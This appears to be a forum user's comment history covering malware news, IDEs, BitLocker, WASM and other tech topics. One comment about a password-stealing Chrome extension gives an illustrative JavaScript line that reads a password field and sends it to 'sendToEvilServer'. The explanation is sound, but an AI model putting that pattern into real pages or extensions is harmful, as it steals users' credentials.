Skip Navigation
Kaspersky reveals ‘elegant’ malware resembling NSA code
  • Here’s the original report: https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/

    It doesn’t specifically attribute this to the NSA, and it’s very hard to definitively say who created what malware anyways.

    That being said, if you read through the report, the details on this really scream “state actor” most probably. The level of modularity, the infrastructure of the C2 server, and the detailed & flexible spying capabilities all point to some government agency more than anything else.

  • Are IDEs mostly bloatware?
  • The thing about an IDE is how tightly integrated all of the tools are.

    If you list the features individually, surely there’s a way to add most of them to your text editor of choice - but the downside is that they’re now all fairly independent features, may not work as thoroughly or covertly, and you might end up with a slower editor altogether.

    Not to say IDEs are the peak of performance - but they tend to provide more robust tooling than is (easily) available in e.g. VSCode/emacs/neovim/whatever.

    It’s like using a specialized power tool - it’s not the right tool for every job, it’s probably a bulkier package, but if you know how to use it an IDE can make your life a lot easier for the right workload.

  • Tested: Windows 11 Pro's On-By-Default Encryption Slows SSDs Up to 45%
  • Sure, but I suspect this is the real motivation for the article:

    Windows 11 Pro force-enables the software version of BitLocker during installation, without providing a clear way to opt out

    It sounds like many people may be using software encryption without realizing it, if Windows 11 Pro uses it by default.

  • Deleted
    *Permanently Deleted*
  • That’s because it makes sense when dynamically creating HTML. HTML is not a programming language, it’s simply markup - so if you want to generate some block of HTML in a loop and later access that block of HTML in JS (e.g. to interact with the UI separate from creating it in the first place), it’s a completely reasonable thing to do.

  • California governor signs law requiring gender-neutral bathrooms in schools by 2026
  • That’s the trick about “gender neutral bathrooms” - they’re just a normal bathroom.

    Some businesses have had them for years. Ever been to a place where you just use the room that’s unoccupied? Congratulations! You’ve used a gender neutral bathroom.

  • Introducing RustRover – A Standalone Rust IDE by JetBrains | The IntelliJ Rust Blog
  • Just as JetBrains is not representative of every dev, neither are LSPs. Some developers want a specialized IDE for their language(s), some want a highly customized editor with their language servers. As long as you efficiently produce code that works, who cares what other people use?

  • Are we ready for javascript without a build step on the front end in 2023?
  • You could do HTMX and WASM, but they both have the same problem in that they generally replace elements in the DOM as opposed to interacting with existing elements in the DOM, and most rendering on both HTMX and WASM actually happens through JavaScript calls.

    In either case you’re limited to only interact with the DOM at the level of abstraction that the framework provides through “behind the scenes” JavaScript calls which will always be a subset of the DOM manipulation that is possible by directly using JS. At least, until there’s a standard DOM access API for WASM.

  • Are we ready for javascript without a build step on the front end in 2023?
  • It’s not a question of performance - it’s just the fact that you need to use JS to modify the DOM in WASM. Until there is access to the DOM from WASM, there simply will be a place for JS in nearly every web app and it’s not because it’s fast, it’s because there are still certain things just need to be done using JS.

    My point is really nothing to do with performance and I agree with the video you’ve linked: WASM is fast enough today. Whenever you can truly stop using JavaScript, I’ll be the first in line. You can already use WASM and eliminate huge portions of JS - but for anything beyond a very simple UI, you always end up with something that needs to be called in JS.

  • Password-stealing Chrome extension smuggled on to Web Store
  • A password manager is not the same as a password stealing app, but it uses the same mechanism. E.g. a password manager might use code like:

    document.querySelector(‘input[type=“password”]’).value = yourPassword;

    This would be placing your password into the password box.

    A password stealing app, on the other hand, would use some far more advanced code like:

    let yourPassword = document.querySelector(‘input[type=“password”]’).value; sendToEvilServer(yourPassword);

    Nowhere is a key logger required or even mentioned for what they’re describing in the article.

  • Swedish criminal gangs using fake Spotify streams to launder money | Spotify
  • Spotify pays artists based on how many listens their songs get, so if you can get a bunch of bots to stream your music over and over you can get a legitimate income stream.

    In this case, they’re using their illegal income to pay people to use a botnet to stream their songs - which then means they have a nice legal income instead.

  • What are your programming hot takes?
  • Honestly, “it’s better than JavaScript” is a pretty low bar.

    I don’t like PHP because I think the syntax is ugly and I’ve only used it on systems that are old and a pain to maintain, but I’ll also very freely admit that I have absolutely not written enough PHP to have an informed opinion on it as a language.

  • InitialsDiceBearhttps://github.com/dicebear/dicebearhttps://creativecommons.org/publicdomain/zero/1.0/„Initials” (https://github.com/dicebear/dicebear) by „DiceBear”, licensed under „CC0 1.0” (https://creativecommons.org/publicdomain/zero/1.0/)JV
    jvisick @programming.dev
    Posts 2
    Comments 63